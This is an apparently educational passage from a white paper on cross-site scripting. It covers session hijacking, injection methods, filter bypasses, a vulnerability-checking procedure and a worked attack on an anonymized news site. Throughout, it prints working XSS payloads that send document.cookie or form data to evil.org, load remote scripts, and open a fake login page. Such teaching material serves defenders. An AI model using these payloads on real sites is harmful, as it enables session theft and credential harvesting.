exercise for an attacker to hijack the victims active session, complet ely bypassing the authentication process. Unfortunately, the mechanism of the at tack is very simple and can be easily automated. A detailed paper by iDefence go es into great detail explaining the process, but can be quickly summarised as fo llows: 1. The attacker investigates an interesting site that normal users must authe nticate to gain access to, and that tracks the authenticated user through the us e of cookies or session IDs 2. The attacker finds a CSS vulnerable page on the site, for instance http:// trusted.org/ account.asp. 3. Using a little social engineering, the attacker creates a special link to the site and embeds it in an HTML email that he sends to a long list of potentia l victims. 4. Embedded within the special link are some coding elements specially design ed to transmit a copy of the victims cookie back to the attacker. For instance: <img src="http://trusted.org/account.asp?ak=<script>document.location .replace(' http://evil.org/steal.cgi?'+document.cookie);</script>"> 5. Unknown to the victim, the attacker has now received a copy of their cooki e information. The attacker now visits the web site and, by substituting his cookie information with that of the victims, is now perceived to be the victim by the server appli cation. Note that Cross-site scripting is commonly referred to as CSS and/or XSS. Understanding Code Insertion To date, security professions have discovered an ever increasing number of metho ds for potentially embedding code within poorly configured web applications. The following are some of the more common methods for doing so. Inline Scripting http://trusted.org/search.cgi?criteria=<script>code</script> http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'> </SC RIPT> http://trusted.org/COM2.IMG%20src= "Javascript:alert(document.domain)" Forced Error Responses http://trusted.org/<script>code</script> This insertion facet usually occurs due to poor error handling by the web server or application component. The application fails to find the requested page and reports an error which unfortunately includes the unprocessed script data. http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script> If a Java application such as a servlet fails to handle an error gracefully, and allows stack traces to be sent to the users browser, an attacker can construct a URL that will throw an exception and add his malicious script to the end of th e request. http://trusted.og/servlet/ org.apache.catalina.servlets.WebdavStatus/<script>cod e</script> In the example above, when the Tomcat servlet is called with the training illegi timate request, an error page is served containing the offending text verbatim. Non <SCRIPT> Events " [event]='code' In many cases it may be possible for an attacker to insert an exploit string, wi th the above syntax, into a HTML tag that should have been like: <A HREF="exploit string">Go</A> resulting in: <A HREF="" [event]='code'">Go</A> <b onMouseOver="self.location.href='http://evil.org/'">bolded text</b> As the client cursor moves over the bolded text, an intrinsic event occurs and t he JavaScript code is executed. JavaScript Entities <img src="&{alert('CSS Vulnerable')};"> The special character & is sometimes interpreted as a new JavaScript code segment (entity). Typical Payloads Formatting <img src = "malicious.js"> <script>alert('hacked')</script> <iframe = "malicious.js"> <script>document.write('<img src="http://evil.org/'+document.cookie+'") </script > <a href="javascript:">click-me</a> Insertion Example Dynamic URL Generation Consider an application built for running on Microsofts Internet Information Serv er (IIS) web server platform. Dynamic content is delivered through IISs Active Se rver Pages (ASP). Within the sample page, a dynamically built HTML tag for refining search paramet ers is constructed as follows: <A HREF="http://trusted.org/search_main.asp? searchstring=SomeString">click-me</ A> and the ASP code required to generate a further query based upon this submitted information is: <% var BaserUrl = "http://trusted.org/search2.asp? searchagain=";Response.Write("<a href=\"" + BaseUrl + Request.QueryString("SearchString") + "\">click-me</a>" ) %> If the attacker was to replace the SomeString with their own code, as indicated ne xt: <a href="http://trusted.org/search_main.asp? SearchString=%22+onmouoseover%3D%27ClientForm% 2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData% 3D%22+%2B+ClientForm%2EPersonalData%3BClientForm% 2Esubmit%3B%27">FooBar</a> The likely result found in the dynamically generated ASP page will be: <A HREF="http://trusted.org/search2.asp? searchagain="" onmouoseover='ClientForm. action="evil.org/get.asp?Data=" + ClientForm.PersonalData;ClientForm. submit;'">click-me</A> In this case, the attacker has added to the HTML page code, and used the DOM of the HTML page to redirect data in some form to the attackers web site. Bypassing Anti-CSS Filters A key function of any application filtering process will be the removal of possi ble dangerous special characters. However, in many circumstances it may be diffi cult to filter a large range of these characters due to the applications unique requirements. Corporate application developers must carefully evaluate how their code will per form with a variety of attack strings. In addition, they should fully understand the different methods that special characters can be encoded. One of the most popular alternative character representations is HTML escaped en coding, sometimes mistakenly referred to as Unicode encoding. In this system, th e HEX value of the ASCII character is prefixed with the % character. Char ; / ? : @ = & < > # Code %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23
Char { } | \ ^ ~ [ ] ` % Code %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27 To better understand the processes behind bypassing Anti-CSS filtering mechanism s, a series of detailed examples are provided below. Inserting Malicious Code Simple Filtering of < and > Many applications that implement some kind of content filtering will typically f ilter out the < and > characters at the client-side. At first glance, this looks lik e an effective way of ensuring <script> type HTML tags are not possible. Unfortu nately, not only client-side code easy to bypass, in many circumstances it can b e bypassed using a mix of alternative character representations and other specia l characters. Consider a routine that removes the < and > special characters: document.write(cleanSearchString('<>')); The attacker now uses an alternative coding for the filtered characters, \x3c and \ x3e respectively, and initialises their code with ) + to escape out of the routine. ') + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e' Commenting out malicious code Consider an application that filters content on behalf of it clients by causing any scripting content to be safely commented out. For instance, <script>code</scri pt> is filtered by the application to become: <COMMENT> <!-- code (NOT PARSED BY FILTER) //--> </COMMENT> Unfortunately, it is a simple task to bypass the filter. This is accomplished by including script code that will close the <comment> filter process. For example , the attacker can send the following code: <script> - --> </COMMENT> <img src="http://none" onerror="alert(document.cookie);window.open( http://evil. org/fakeloginscreen.jsp); "> </script> After processing by the filter, the following code is embedded in the returned d ocument: <COMMENT> <!-- - --> </COMMENT> <img src="http://none" onerror="alert(document.cookie);window.open(http://evil.o rg/ fakeloginscreen.jsp);"> </COMMENT> This particular attack was originally designed to bypass the security filtering processes of a large web-mail provider, and would have been embedded in HTML ema il content. Users viewing the email would automatically be prompted with a fake login screen, making for an easy method of harvesting user names and passwords. Separate Window Handling A popular method of handling potentially dangerous URL information is to force t he URL to be opened in a new browser window. This then causes and malicious code to be executed in the context of a different DOM, using the target=_blank addition to the HTML <HREF> tag. Unfortunately, in many online email applications it is possible to bypass after analysing the harmless link supplied by the site. Consider a site that parses the content, <a href="javascript:">click-me</a> and, after processing, becomes: <a href="javascript:" target="_blank">click-me</a> Causing the URL to be opened in a new window. However, if the attacker constructs his HREF as follows, <a href="javascript:..." foo="bar>click-me</a> it will be interpreted as: <a href="javascript:..." foo="bar target="_blank">click-me</a> causing the code to be executed in the same page, under the same DOM. Escaped JavaScript Entities In cases where almost all special characters have are filtered from user supplie d strings, attackers must encode the entire attack string. Consider the following URL: http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL %27%29%7d%3b&apropos=p os2 The %26%7balert%28%27EVIL%27%29%7d%3b resolves to &{alert('EVIL')}; causing in thi s instance an unexpected JavaScript alert window to popup, with the text EVIL. Web Integration As client web browsers have evolved, they have incorporated an increasingly dive rse range of functions. At the same time, many common desktop applications have extended their functionality to replicate or incorporate the functionality of th ese same browsers. While the security flaw may be HTML injection, and more speci fically CSS, the avenues available for a malicious user or attacker to initiate the attack are becoming ever broader. As is already evident, a popular personalis ed delivery mechanism has now become HTML email. Unfortunately, the delivery meth ods are becoming so diverse that no single security solution is available to preve nt the attack. Consider the significance of the following delivery mechanisms. The Flash! Attack Flash! is a popular application for displaying animated visual information. Is h as its own development language (ActiveScript) for creating sophisticated interac tive menus, animated movies and games. The most popular web browsers often insta ll the interpreter for these files by default and, due to the large number of si tes that use the technology; many people will install the interpreter even if it wasnt originally available with their web browser. ActiveScript has an internal function called getURL(). This function is used for redirecting the client browser to another page. Normally the parameter supplied to the function would be a URL. However, due to integration features between th e Flash! interpreter and the web browser, it is possible to insert scripting cod e that would be successfully interpreted by the client web browser. For instance, instead of: getURL("http://www.technicalinfo.net") It is possible to specify scripting code: getURL("javascript:alert(document.cookie)") Thus, it is possible to embed potentially dangerous scripting elements within a common file format. The real significance of this threat is that it potentially bypasses many corporate content inspection systems (particularly those that filt er out HTML <script> type tags) and local security web browser settings. For an attack to be successful, the dangerous Flash! file (typically terminating in a .swf extension) must be embedded within HTML data for viewing by remote clie nts. Normally this occurs with the use of the <EMBED> or <OBJECT> tags, for inst ance: <EMBED src="http://evil.org/badflash.swf" pluginspage="http://www.macromedia.com/shockw ave/download/index.cgi? P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100" height="100"> </EMBED> The Impact The impact of malicious code insertion is often difficult to quantify and will c hange as new functionality or interactions are incorporated into both web server s and client browsers. Already, users may unintentionally execute scripts writte n by an attacker when they follow untrusted links in web pages, mail or instant messages, or any other application capable of displaying HTML content (e.g. Micr osoft Help). For this reason, a series of examples best illustrate the diversity and impact of potential threats. Consider the following examples: * An attacker often has access to the document retrieved since the malicious scripts are executed in a context that appears to have originated from the trus ted site. With the appropriate insertions, a script could be used to read fields in a form provided by the trusted server and send this data back to the attacke r. * An attacker may be able to embed script code that has additional interacti ons with the legitimate web server without alerting the victim. For example, the attacker could develop an exploit that posted data to a different page on the l egitimate web server. * An attacker may be able to poison the sites persistent cookies, thus modif ying the cookie content and causing malicious code to be executed each time the user visits the trusted site. The malicious code is stored as a field variable w ithin the cookie, and executed each time the site dynamically generates page con tent without the correct processing. * An attacker may be able to cause a hidden window to start on the client mach ine and us this to key-log all browser interaction of the victim. Should the vic tim later visit sites requiring authentication, the attacker could harvest this information. * CSS type attacks can occur over SSL-encrypted connections. The victim, acc essing a trusted host over HTTPS, may still execute an attackers code unintentio nally. If the attacker references document components on a remote host, the vict ims client browser may generate a warning message about the insecure connection. However, the attacker can circumvent this warning by simply referencing content on a SSL-capable web server. * An attacker may construct the malicious code to reference internal resourc es. Thus, an attacker may gain unauthorised access to an Intranet web server. On ly one page on one web server in a domain is required to compromise the entire d omain. * An attacker may be able to bypass policies that prevent the victim browser from executing scripts. For example, Internet Explorer security zones may prevent the execution of scripts from untrusted Internet hosts. An attacker may embed t heir code within the content of a trusted internal host. * An attacker may use a social engineering aspect to the attack. Consider an application that requires clients to complete a form to set up their account. A n attacker may be able to insert malicious code into their application data. A q uick phone call to the corporate help-desk asking for advice on their account ma y cause the execution of the malicious code on the help-desk system. * Even if the victims web browser does not support scripting, an attacker may still be able to alter the content of the page affecting its appearance, behavi our or normal operation. To date the most popular application content to be targeted by attackers has bee n web pages that: * Return results based upon user input to search engines, * Process credit card information, * Store and user supplied content in databases and cookies for later retriev al. Vulnerability Checking Finding out if your application is vulnerable to a code insertion attack is ofte n very simple. The key lies in the analysis of the dynamically generated client- side HTML content. The following process has been frequently used in the past. 1. For each visible input field (these may be located in an HTML form, or rep resented in the URL as variable=), try the most obvious scripting formats: <script>alert('CSS Vulnerable')</script> <img csstest=javascript:alert('CSS Vulnerable')> &{alert('CSS Vulnerable')}; In any case, should an alert message popup with the text CSS Vulnerable, the application component is vulnerable - specifically the input field just checked . 2. If, either of the above scripting checks cause the HTML page to display in correctly, the application component may still be vulnerable. 3. For each visible variable, submit/substitute the following string: '';!--"<CSS_Check>=&{()} (Note that the string begins with two single-quot es) On the resultant page, search for the string <CSS_Check>. If you discover <CS _Check>, it is quite probable that the application component is vulnerable. Howev er, if the word CSS_Check is no longer enclosed in something similar to %ltCSS_C heck%gt, then it may not be vulnerable. If input is displayed literally at ANY p oint in the document, it can be used to divert the flow of execution to an attac ker-supplied payload. 4. Having located the word CSS_Check, verify what (if any) other characters h ave be altered or filtered from the original string '';!--"<CSS_Check>= &{()}. Dep ending upon the filtered characters, the application component may still be vuln erable. 5. Looking closely at the returned HTML code, identify the specific string an attacker would need to break out of the current HTML tag or code sequence. If t hese characters exist, unfiltered, in responses to the test string of part 3 (ab ove) then there is a high probability that the application component is vulnerab le. 6. Moving on from the obvious fields, repeat the process for all the hidden f ields not normally editable at the client end. The best method of doing this is through the use of a free local host proxy server such as Achilles by DigiZen Se curity group and WebProxy by @stake. The proxy servers allow the editing of HTTP requests as they leave the client application, before being finally sent to the server application. 7. In many cases, data will be submitted via the HTTP GET request. Throughout the investigation, take note of potentially vulnerable application components t hat require the HTTP POST command to submit data. It is a simple process of turning a POST into a GET submission. If the applicati on component fails to respond to the GET the same way as it did for the POST sub mission, it is probably not vulnerable to a URL based inline scripting attack. Putting It All Together To bring together many of the ideas and processes discussed earlier in this docu ment, an example can be used to bring it all together. In this example, the anon ymous site has a search engine that responds to client data submissions. Normall y the site would look like this: In our first test, we try submitting our first test string <script>alert('CSS Vu lnerable')</script>, and receive the following response: Notice the strange response in the Your Search box on the left. Zoomed in below. Taking a closer look at the content source, we notice that our sample code appea rs 21 times in the document, in various formats. It appears 10 times in a format similar to: <SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/ anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable') </script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT> 9 times in a format similar to: <a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript %3E&pager.offset=10">2</a> And twice in the format similar to: document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\ "70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>'); Obviously there are three different server-side processing routines for processi ng client search data. 1. In the first type (ad.uk.doubleclick.net format), it appears that the proc essing routine changes the case of characters and changes white space to the und erscore (_). 2. The second type (href=) converts special characters into their escape-enco ded formats, and white space into the + character. 3. The third type (document.writeln) places the complete string within a docu ment.writeln JavaScript routine. Several opportunities present themselves here. To make the site execute the Java Script alert box for each type, we need to force the <script> tags outside of an y other HTML tags. Thus, for each type, the following methods will work: 1. ><script>alert('CSS Vulnerable')</script><b a=a 2. a></a><script>alert('CSS Vulnerable')</script> 3. \'><script>alert%28\'CSS Vulnerable\'%29</script>< The result is the following alert box (multiple times): However, for this example, we shall focus on the last type (document.writeln). S ince it is possible to inject code into the returned HTML page to the anonymous News site, to make the attack interesting, we shall write our own fake news articl e. Due to the maximum length of any string we can send to the site, and the likely length of the fake news article, we shall create a JavaScript include file (.js) which we will load in to the page using: \'><script%20src%3dhttp://evil.org/fak ed.js></script> In this example, the include file will use multiple document.write statements to create the fake news article. There are several key features to the include fil e, and include - * Use of HTML <DIV> tags to position the content on the page. Doing so allow s the attacker to cover over existing content as they wish. * Using a table to keep all the article text together. * Rewriting of the URL source field at the top of the browser. * Rewriting of the browser status bar. From the first few lines of the fake.js file: var d = document; d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2"> <TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>'); d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>'); So far, everything we have tested on the site makes use of the existing form to submit the attackers code. This submission is done by a HTTP POST command, such a s: POST /Search HTTP/1.0 Referer: http://www.anonymous.com/Search Accept-Language: en-gb Content-Type: application/x-www-form-urlencoded Host: www.anonymous.com Content-Length: 135 Pragma: no-cache dropnav=Pick+a+section&q=\'><script%20src%3dhttp://evil.org/faked.js> </script>newSearch=true&pro=IT&searchOption=articles It is a simple process to convert the HTTP POST into a single URL. Unfortunately for the anonymous news site, the web application does not differentiate the met hods of receiving data. Thus the following attack URL allows the attacker to pla ce his own content on the site. http://www.anonymous.com/Search?dropnav=Pick+a+section&q=\'><script %20src%3dhttp://evil.org/faked.js></script>newSearch=true&pro=IT &searchOption=articles